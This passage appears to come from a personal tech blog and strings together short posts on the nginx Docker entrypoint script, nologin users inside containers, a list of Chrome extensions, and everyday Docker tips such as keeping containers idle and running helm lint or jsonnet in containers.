if [ "$1" = "nginx" -o "$1" = "nginx-debug" ]; then
    if /usr/bin/find "/docker-entrypoint.d/" -mindepth 1 -maxdepth 1 -type f -print -quit 2>/dev/null | read v; then
        # redirect the message from 1 (implicitly) to 3 (stdout in essence)
        # echo >&3 facilitates reading, see the explanation below
        echo >&3 "$0: /docker-entrypoint.d/ is not empty, will attempt to perform configuration"

        echo >&3 "$0: Looking for shell scripts in /docker-entrypoint.d/"
        find "/docker-entrypoint.d/" -follow -type f -print | sort -V | while read -r f; do
            case "$f" in
                *.sh)
                    # -x: file exists and is executable
                    if [ -x "$f" ]; then
                        echo >&3 "$0: Launching $f";
                        "$f"
                    else
                        echo >&3 "$0: Ignoring $f, not executable";
                    fi
                    ;;
                *) echo >&3 "$0: Ignoring $f";;
            esac
        done

        echo >&3 "$0: Configuration complete; ready for start up"
    else
        echo >&3 "$0: No files found in /docker-entrypoint.d/, skipping configuration"
    fi
fi

# process replacement
exec "$@"

Explanation: exec 3>&1 opens file descriptor 3 and points it at stdout (or at /dev/null in quiet mode), and because it is done with exec the setting persists for the rest of the script. Later, echo >&3 writes through fd 3, so all of the entrypoint's own messages can be switched between stdout and /dev/null in one place instead of touching every echo.

Previously I had a post that talked about login and non-login shells; note that is a different concept from the nologin user discussed here.

Take the Envoy image as an example: pull it and launch the container:

docker pull envoyproxy/envoy-dev:latest

docker run -d \
--name test \
--entrypoint=/bin/bash \
envoyproxy/envoy-dev:latest \
-c "tail -f /dev/null"

Get into the container with (note this is not a login operation! See my question below):

docker exec -it test bash

Check the /etc/passwd file; envoy is a nologin user:

envoy:x:101:101::/home/envoy:/usr/sbin/nologin

If you run su - envoy from any other user (even if you enter the login password), you get an error:

# su - envoy
This account is currently not available

From nologin man page, the description is clear: nologin displays a message that an account is not available and exits non-zero. It is intended as a replacement shell field to deny login access to an account. If the file /etc/nologin.txt exists, nologin displays its contents to the user instead of the default message. The exit code returned by nologin is always 1.

Sometimes you will also see /bin/false used:

syslog:x:101:104::/home/syslog:/bin/false

They both serve the same purpose, but nologin is preferred since it gives you a friendly message. ssh, scp and other login services will not work if the user's shell is nologin on the target machine.

BTW, you can still execute commands as a nologin user:

sudo -u <nologin user name> bash -c "ls -ltr /tmp"
## or launch a shell
sudo -u <nologin user name> bash

Then I had a question here: why can the docker exec command launch a shell for a nologin user? It turns out docker exec is not a login action! It just starts a process in the container's PID namespace, and its PPID is 1.

References

  • Does /usr/sbin/nologin as a login shell serve a security purpose?
  • https://serverfault.com/questions/519215/what-is-the-difference-between-sbin-nologin-and-bin-false
  • https://serverfault.com/questions/333321/executing-a-command-as-a-nologin-user
  • Don't sshd your container: an old post from the early days of Docker, before docker exec; it uses nsenter to get a shell into a container's namespace.

Some useful Chrome extensions:

  • OneTab: collects multiple tabs into a list on a single page; shareable.
  • Grammarly for Chrome: English grammar checking.
  • SimpleUndoClose: reopen closed tabs.
  • Screen Shader: adjustable eye-protection mode.
  • Dark Reader: dark mode.
  • Clean Master: one-click cleanup of browser cache and history, configurable.
  • Octotree: shows the structure of a GitHub repository's code in a sidebar, with click-to-jump navigation.
  • Tab Resize: splits the browser window to compare content side by side.
  • JSON Formatter: automatically formats JSON files in the browser.
  • Awesome Autocomplete for GitHub: autocompletion when searching GitHub projects, making them easier to find.
  • Wappalyzer: identifies the tech stack used by the current website.
  • Extension Manager: manages all extensions in one place.
  • ZenHub for GitHub: ZenHub's management extension; requires login.

Here I mainly record some interesting ways to use docker containers.

Version Release

You can package source code into a Docker image (tag) or a Helm chart and release it through a check-in pre/post CI/CD pipeline, then consume it in K8s or Jenkins pipelines. This makes the whole flow well standardized and easy to manage.

Run in Background

I used to keep containers running in the background by changing --entrypoint to /bin/sh plus -c "tail -f /dev/null". Actually you can just use -d (detach) by default, but you must understand how the entrypoint/cmd are set, for example:

# the busybox image is built with CMD ["sh"], so here it runs sh by default
# together with -it, this container stays idle in the background
docker run -itd busybox

# if the image has an entrypoint other than sh or bash, to make it idle
# we have to reset the entrypoint
docker run -itd --entrypoint=/bin/sh <image>:<tag>

Wrap Dependencies

Build the tools you depend on into a docker image, then run a docker container to do the work, mounting the resources to be processed into the container. For example the helm linter cv:

1
2
3
docker run --rm -it \
-v pathto/chart:/chart \
cv:latest cv lint helm /chart

Logs may also be captured by passing an additional volume: -v ~/path/to/logs:/tmp/cv

Another example is jsonnet, for which setting up a local environment is relatively difficult:

# check jsonnet help
docker run --rm -it bitnami/jsonnet:latest --help

# convert Chart.yaml.jsonnet to Chart.yaml
# -V: pass parameters to chart.yaml.jsonnet
# -S: plain text display
# sed -e 's/"//g': remove double quotes, but need to quote the version number

# the entrypoint is jsonnet cli
docker run \
--rm \
--user root \
-v pathto/Chart.yaml.jsonnet:/Chart.yaml.jsonnet \
bitnami/jsonnet:latest /Chart.yaml.jsonnet -V version="1.0.0" -S | sed -e 's/"//g'